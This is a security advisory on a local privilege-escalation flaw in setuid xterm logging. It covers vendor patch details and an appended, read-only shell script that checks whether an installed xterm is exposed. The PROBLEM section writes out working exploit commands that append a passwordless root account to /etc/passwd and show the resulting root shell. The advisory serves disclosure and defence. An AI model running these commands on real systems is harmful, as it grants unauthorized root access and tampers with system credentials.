COMMAND

    xterm(1)

SYSTEMS AFFECTED

    Systems running xterm as a setuid or setgid process.

PROBLEM

    The vulnerability allows local users to create files or modify any
    existing file. If the xterm on your system does not allow logging,
    the vulnerability cannot be exploited. To determine if logging is
    enabled, run xterm with the "-l" option. If an "XtermLog.axxxx" file
    is created in the current directory, xterm supports logging. You can
    also check the output of "xterm -help" to see whether the "-l" option
    is described as "not supported". This vulnerability allows anyone
    with access to a user account to gain root access. This can be
    exploited by:

        % cat >! /tmp/fofo
        newroot::0:0:The New Superuser on the block:/:/bin/sh
        ^D

        % xterm -l -lf  /etc/passwd -e cat /tmp/fofo
        % su newroot
        # whoami
        root
        # id
        uid=0(root) gid=0(wheel)

SOLUTION

    Install the vendor-supplied patch if one is available. If your site
    is using the X Consortium's X11R5, install the public patch #26. This
    patch is available via anonymous FTP from ftp.x.org as the file
    /pub/R5/fixes/fix-26. By default, the patch disables logging. If you
    choose to enable logging, a variation of the vulnerability still
    exists. Convex machines had this fixed in CXwindows V3.1; it is fixed
    in CXwindows V3.0 with TAC patch V3.0.131 applied. Crays had it fixed
    in Cray Visualization Toolkit (CVT) version 2.0 and later. Ultrix
    V4.4 and OSF/1 V1.3 are safe. To fix it in Ultrix V4.3 and OSF/1 V1.2
    use CSCPAT Kit CSCPAT_4034 V1.1. For SCO, the current releases listed
    next are not vulnerable to this problem, as no xterm logging or
    scoterm logging is provided: SCO Open Desktop Lite, Release 3.0; SCO
    Open Desktop, Release 3.0; SCO Open Server Network System, Release
    3.0; and SCO Open Server Enterprise System, Release 3.0. Sequents had
    this fixed. Sun's version of xterm has not been setuid root since at
    least as far back as SunOS 4.1.1, and probably further. An xterm that
    does not run setuid or setgid is not vulnerable to the xterm logging
    problem. CAUTION: A Sun patch (#100728-02) was issued December 9,
    1992 to give system administrators the option of running xterm suid
    root. Installing this patch will introduce the xterm logging
    vulnerability. So check your xterm.
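
    The two conditions the advisory names (xterm runs setuid/setgid, and
    xterm was built with logging, which "xterm -help" reveals by marking
    "-l" as "not supported" when it was not) can be checked with a small
    POSIX shell script. The script below is added here as an example; it
    is not part of the advisory. The function names and the two sample
    "-help" texts are constructed for illustration, and the only
    assumption about xterm is the "not supported" wording the advisory
    itself describes.

```shell
#!/bin/sh
# Added example (not part of the advisory): report whether an xterm
# binary is exposed to the logging problem, i.e. it is setuid/setgid
# AND its "-help" output does not mark "-l" as "not supported".

# Constructed sample help texts, modelled on the advisory's description.
SAMPLE_HELP_DISABLED='Usage: xterm [-options ...]
   -l                   turn on logging (not supported)
   -lf filename         logging filename (not supported)
   -e command args      execute command'

SAMPLE_HELP_ENABLED='Usage: xterm [-options ...]
   -l                   turn on logging
   -lf filename         logging filename
   -e command args      execute command'

# logging_status HELP_TEXT
#   prints "disabled" if the "-l" line says "not supported",
#   "enabled" if a "-l" line exists without that note,
#   "unknown" if no "-l" line is found (check manually with "xterm -l").
logging_status() {
    # Match only the bare "-l" option, not "-lf" or "-ls".
    line=$(printf '%s\n' "$1" | grep -E '^[[:space:]]*-l([[:space:]]|$)')
    if [ -z "$line" ]; then
        echo unknown
    elif printf '%s\n' "$line" | grep -qi 'not supported'; then
        echo disabled
    else
        echo enabled
    fi
}

# is_privileged PATH -> true if the file has the setuid or setgid bit.
is_privileged() {
    [ -u "$1" ] || [ -g "$1" ]
}

# xterm_exposure BINARY HELP_TEXT -> prints a one-line verdict.
xterm_exposure() {
    if ! is_privileged "$1"; then
        echo "not vulnerable: not setuid/setgid"
        return 0
    fi
    case $(logging_status "$2") in
        disabled) echo "not vulnerable: logging not supported" ;;
        enabled)  echo "VULNERABLE: privileged xterm with logging" ;;
        *)        echo "unknown: run xterm -l and look for XtermLog.a* in the cwd" ;;
    esac
}

# Live check of the installed xterm, if any (output only; nothing is changed).
if command -v xterm >/dev/null 2>&1; then
    bin=$(command -v xterm)
    echo "$bin: $(xterm_exposure "$bin" "$(xterm -help 2>&1)")"
fi
```

    Run it on each host as an unprivileged user; a "VULNERABLE" verdict
    means the binary should lose its setuid/setgid bit or be replaced by
    the patched build described above.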